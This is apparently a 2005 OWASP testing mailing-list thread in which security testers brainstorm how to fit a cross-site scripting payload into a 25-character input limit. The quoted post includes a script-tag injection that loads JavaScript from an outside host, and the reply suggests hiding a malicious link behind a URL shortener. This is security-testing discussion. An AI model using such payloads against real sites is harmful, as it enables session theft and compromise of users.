[OWASP-Ireland] Re: [OWASP-TESTING] XSS in 25 characters or less
alsmola at yahoo.com
Wed May 18 14:40:35 EDT 2005
You could use tinyurl.com to embed a malicious link
(say, one that executes a XST attack). This still
requires a windows larger than 25 to get the domain to
execute a malicious XSS, I think.
--- Eoin Keary <eoinkeary at hotmail.com> wrote:
> I have a window of 25 chars to perform a XSS
> anything more is truncated by the server.
> <script src=http://a.com/z.js></script>
> - this is 39 chars
> We can do HTML injection ("<a href=....") to a
> degree but anyone any ideas
> on how to execute script in such a small window (25
> we need to stay in the same domain (xyz.com) inorder
> to make the attack
> useful. so redirecting to another domain with the
> "<a href..." is no good.
> First correct answer gets a pint of Guinness (Larry
> S, you're not included
> for the pint as I owe you too many).
> More features, more fun, still absolutely FREE - get
> Messsenger 7.0!
> This SF.Net email is sponsored by Oracle Space
> Want to be the first software developer in space?
> Enter now for the Oracle Space Sweepstakes!
> owasp-testing mailing list
> owasp-testing at lists.sourceforge.net
More information about the Owasp-ireland